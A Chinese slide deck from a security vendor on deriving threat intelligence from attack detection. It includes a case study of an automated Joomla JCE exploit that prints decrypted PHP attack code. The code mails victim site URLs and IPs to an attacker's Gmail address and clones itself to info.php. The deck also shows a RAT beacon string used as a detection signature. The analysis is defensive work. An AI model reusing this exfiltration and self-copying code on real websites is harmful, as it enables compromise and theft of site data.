如何产生威胁情报-高级恶意攻击案例分析 神州网云 CEO 宋超 Content 目录 1 高级恶意攻击检测&威胁情报 2 多维检测与威胁情报 3 重要线索的分析工作及案例分析 4 威胁情报与高级恶意攻击检测价值体现 5 未来高级恶意攻击检测和威胁情报的趋势 C 目录 ONTENTS 01 高级恶意攻击检测&威胁情报 目前高级恶意攻击影响到国家多行业多领域  电信 网络设备遭受攻击  银行 诈骗、盗取资金  企业 商业情报及知识产权被窃取  国家 发现具有窃密行为的攻击  能源 具有破坏行为的攻击 发现高级恶意攻击行为 产生 损失 安全 防御 检测过程中面临的问题  怎样从海量告警线索中发现高质量的攻击线索  怎样从单一的攻击线索中扩展更多有效线索  攻击者的目的、动机、背景 结合威胁情报落地 内部威胁、外部威胁、关键资产的监测 关键 资产 监测 通过分析内部网络流量，采用机器学习的方式自动化的识别组织内的安全资产（设备） 并且打上标识，可根据资产上存放的数据的重要程度及资产的使用者的重要性来确定是 否是关键资产 内部 威胁 多数用户的网络行为是可预测的。恶意的内部人员在偷盗数据或搞破坏前一定有异常的 行为。对于可疑的员工连接关键资产一定要引起足够重视。这种异常不一定是一个违规 行为，可以结合外部的威胁情报作为重要的调查信息。案例：通过外部威胁情报获取公 司员工在招聘网站有简历变动的情况，有可能会离职，结合上面发现的可疑员工的违规 行为判断出内部危胁情况 外部 威胁 传统局部的、各自为政的、基于特征的信息安全解决方案在当今世界信息安全争夺战中 已经暴露出极大的不足，高级恶意攻击检测类系统结合威胁情报对已知及未知威胁的恶 意行为实现早期的快速发现，并可对受害目标及攻击源头进行精准定位，最终达到对入 侵途径及攻击者背景的研判与溯源，把危害损失降到最小。 C 目录 ONTENTS 02 多维检测与威胁情报 全方位攻击检测流程图 多角度不同视点看高级恶意攻击检测 线索分析多维度分析 多维威胁情报库中包含全球APT攻击事件、各种远控木马、扫描器、webshell等规则 针对各种攻击行为进行识别 Part 03 发现一条重要线索 针对发现重要线索进行下一步工作及案例分析 全球著名的joomla内容管理系统漏洞 专家取证分析 通知用户方 对报警数据进行 取证分析 进行后续的漏 洞修补及防护 工作 网镜高级恶意威胁检测系统 威胁情报 恶意行为告警中主动发现 恶意攻击行为 结合威胁情报 对线索进行查 询、溯源分析 网镜高级恶意感胁检测系统恶意行为告警中 主动发现的攻击行为数据包 解析出告警攻击数据的内容 分析后续的攻击特征 解密后的部分代码 $serper=gethostbyname($_SERVER['SERV ER_ADDR']); $injektor = gethostbyname($_SERVER['REMOTE_ADD R']); mail("vir.lin90@gmail.com", "$body","Hasil Bajakan http://$web$inj\n$security\nIP Server = $serper\n IP Injector= $injektor"); $_SESSION['bajak'] = 0; } else {$_SESSION['bajak']++;}; if(isset($_GET['clone'])){ $source = $_SERVER['SCRIPT_FILENAME']; $desti =$_SERVER['DOCUMENT_ROOT']."/info.ph p"; 分析代码可知程序为自动化攻joomla网 站，利用的漏洞是joomla jce漏洞，攻 击成功会给调用linux系统的mail函数给 攻击者gmail邮箱发送邮件，内容为存在 漏洞的网站url和ip地址 产生威胁情报的重要线索： vir.lin90@gmail.com 漏洞认证情况及修补工作 Part 04 威胁情报与多维检测价值体现 怎样发现攻击事件中的关键点［案例］ lv|'|'|2YLYr9mK2YVfQzQyMzlGMzA=|'|'|PERSONNEL5PC|'|'|user|'|'|1436-05-06|'|'|SAU|'|'|Win 7 Professional SP1 x86|'|'|No|'|'|0.5.0E|'|'|..|'|'|2LTYp9iqINiz2YjYp9mE2YHZhtinINi n2YTYtdmI2KrZiiAtIFdpbmRvd3MgSW50ZXJuZXQgRXhwbG 9yZXI=|'|'|682dfec8c66a0de6f1475ca73c462a69,39b7927e0 d4deb5c10fb380b7c53c617,[endof] 利用威胁情报在高级攻击检测中进行多维线索扩线 利用圈中所画的[endof ] 特征对历史数据进行可视化关联分析得到我们所需要的MD5、 域名、ＩＰ、ＵＲＬ、木马样本及分析报告等重要信息 [endof ]